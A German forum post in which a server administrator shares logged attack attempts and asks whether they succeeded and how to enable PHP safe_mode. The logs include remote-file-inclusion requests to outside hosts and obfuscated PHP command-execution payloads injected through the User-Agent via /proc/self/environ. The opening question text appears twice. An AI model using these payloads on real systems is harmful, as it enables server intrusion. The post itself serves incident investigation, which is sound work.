Moin,
gestern hat mir logwatch in der täglichen e-Mail folgendes mitgeteilt:
Darauf hab ich erstmal in die access.log geschaut. Dort stand dann folgendes:
Das ist jetzt nur ein Auszug.
Damit kenn ich mich nicht wirklich aus, aber sieht so aus, als ob da jemand versucht hat php-Code einzuschleusen und auzuführen.
Mir stellt sich nun die Frage, ob es sich dabei um einen gescheiterten Versuch handelt, oder ob der Angreifer damit Erfolg hatte. Wie kann ich das feststellen?
Das ist sozsagen mein "erstes Mal" , wie geh ich also nun weiter vor?
Kurz noch einige Facts zur Konfiguration: safe_mode off (laut phpinfo und confixx Webinterface, laut den ganzen php.ini-Dateien sollte er jedoch an sein?) disabled_functions keine, suphp, confixx, zend optimizer.
safe_mode, würde ich gerne aktivieren, jedoch bringt mich das Bearbeiten der php.ini-Dateien und per Confixx-Webinterface da nicht weiter (phpinfo sagt weiterhin, dass er aus ist). Woran kann das liegen?
gestern hat mir logwatch in der täglichen e-Mail folgendes mitgeteilt:
Code:
Attempts to use known hacks by 2 hosts were logged 6 time(s) from:
host-14.azamedia.com: 4 Time(s)
8.7.26.27: 2 Time(s)
Darauf hab ich erstmal in die access.log geschaut. Dort stand dann folgendes:
Code:
host-14.azamedia.com - - [17/Sep/2008:15:56:37 +0200] "GET /champions-league-uefa-cup//index2.php?mosConfig_absolute_path=http://www.agsplus.ru/content/i??? HTTP/1.1" 404 14 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
host-14.azamedia.com - - [17/Sep/2008:15:56:37 +0200] "GET /champions-league-uefa-cup/errors.php?error=http://www.agsplus.ru/content/i??? HTTP/1.1" 404 14 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
host-14.azamedia.com - - [17/Sep/2008:15:56:38 +0200] "GET /champions-league-uefa-cup//index2.php?mosConfig_absolute_path=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 14 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
host-14.azamedia.com - - [17/Sep/2008:15:56:38 +0200] "GET /champions-league-uefa-cup//index2.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 14 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
host-14.azamedia.com - - [17/Sep/2008:15:56:38 +0200] "GET //index2.php?mosConfig_absolute_path=http://www.agsplus.ru/content/i??? HTTP/1.1" 404 14 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
host-14.azamedia.com - - [17/Sep/2008:15:56:39 +0200] "GET /errors.php?error=http://www.agsplus.ru/content/i??? HTTP/1.1" 404 14 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
host-14.azamedia.com - - [17/Sep/2008:15:56:39 +0200] "GET //index2.php?mosConfig_absolute_path=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 14 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
host-14.azamedia.com - - [17/Sep/2008:15:56:39 +0200] "GET //index2.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 14 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
host-14.azamedia.com - - [19/Sep/2008:13:41:47 +0200] "GET /champions-league-uefa-cup//index2.php?mosConfig_absolute_path=http://www.kampeermarkt.com/banner/i??? HTTP/1.1" 404 14 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
host-14.azamedia.com - - [19/Sep/2008:13:41:48 +0200] "GET /champions-league-uefa-cup/errors.php?error=http://www.kampeermarkt.com/banner/i??? HTTP/1.1" 404 14 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
host-14.azamedia.com - - [19/Sep/2008:13:41:48 +0200] "GET /champions-league-uefa-cup//index2.php?mosConfig_absolute_path=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 14 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
host-14.azamedia.com - - [19/Sep/2008:13:41:49 +0200] "GET /champions-league-uefa-cup//index2.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 14 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
Das ist jetzt nur ein Auszug.
Damit kenn ich mich nicht wirklich aus, aber sieht so aus, als ob da jemand versucht hat php-Code einzuschleusen und auzuführen.
Mir stellt sich nun die Frage, ob es sich dabei um einen gescheiterten Versuch handelt, oder ob der Angreifer damit Erfolg hatte. Wie kann ich das feststellen?
Das ist sozsagen mein "erstes Mal" , wie geh ich also nun weiter vor?
Kurz noch einige Facts zur Konfiguration: safe_mode off (laut phpinfo und confixx Webinterface, laut den ganzen php.ini-Dateien sollte er jedoch an sein?) disabled_functions keine, suphp, confixx, zend optimizer.
safe_mode, würde ich gerne aktivieren, jedoch bringt mich das Bearbeiten der php.ini-Dateien und per Confixx-Webinterface da nicht weiter (phpinfo sagt weiterhin, dass er aus ist). Woran kann das liegen?
Last edited by a moderator: